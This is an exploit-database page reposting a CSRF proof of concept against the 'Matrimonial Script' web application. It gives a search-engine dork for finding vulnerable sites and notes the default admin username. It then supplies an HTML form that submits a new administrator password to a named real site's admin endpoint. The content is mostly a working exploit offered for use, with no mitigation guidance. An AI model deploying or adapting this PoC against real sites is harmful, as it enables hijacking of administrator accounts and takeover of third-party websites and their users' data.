Advertisement



Edit Report

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018070119

Below is a copy:

Matrimonial Script CSRF Vulnerability
======================================================================================================================================
| # Title     : Matrimonial Script CSRF Vulnerability                                                                                |
| # Author    : indoushka                                                                                                            |
| # Tested on : windows 10 Franais V.(Pro)                                                                                          |
| # Vendor    : http://www.scubez.net/                                                                                               |  
| # Dork      : "printprofile.php?id="                                                                                               |
======================================================================================================================================


poc :


[+]  Dorking n Google Or Other Search Enggine .

[+]  Save code as poc.html file.

[+]  Default user for admin = admin

 <td class="headertext" width="97%">SET ADMIN PASSWORD </td>
          </tr>
        </tbody></table>
          <br>
          <table width="98%" cellspacing="0" cellpadding="0" border="0" align="center">
            <tbody><tr>
              <td><div class="smalltextgrey" align="center">
                  <div class="smalltextred" align="left"> Below is the list of Administrator Password. You can   change/edit admin's password </div>
              </div></td>
            </tr>
          </tbody></table>
          <br>
          <form name="signupForm" id="signupForm" method="post" action="http://www.sweetsathi.com/admin/adminpass_submit.php" onsubmit="return Check_form();"> 
        
  <table class="blackbox" width="50%" cellspacing="3" cellpadding="3" border="0" align="center">
            <tbody><tr>
              <td width="40%">New Password  : </td>
              <td width="60%"><input name="txtp" id="txtp" type="password"></td>
            </tr>
            <tr>
              <td>Confirm Password : </td>
              <td><input name="txtcp" id="txtcp" type="password"></td>
            </tr>
            <tr>
              <td>&nbsp;</td>
              <td><input name="Submit" value="Submit" type="submit"></td>
            </tr>
          </tbody></table>
  </form>
  <p>&nbsp;</p></td>


Greetings to :=========================================================================================================================
                                                                                                                                      |
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh     |
                                                                                                                                      |
=======================================================================================================================================

Copyright ©2018 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.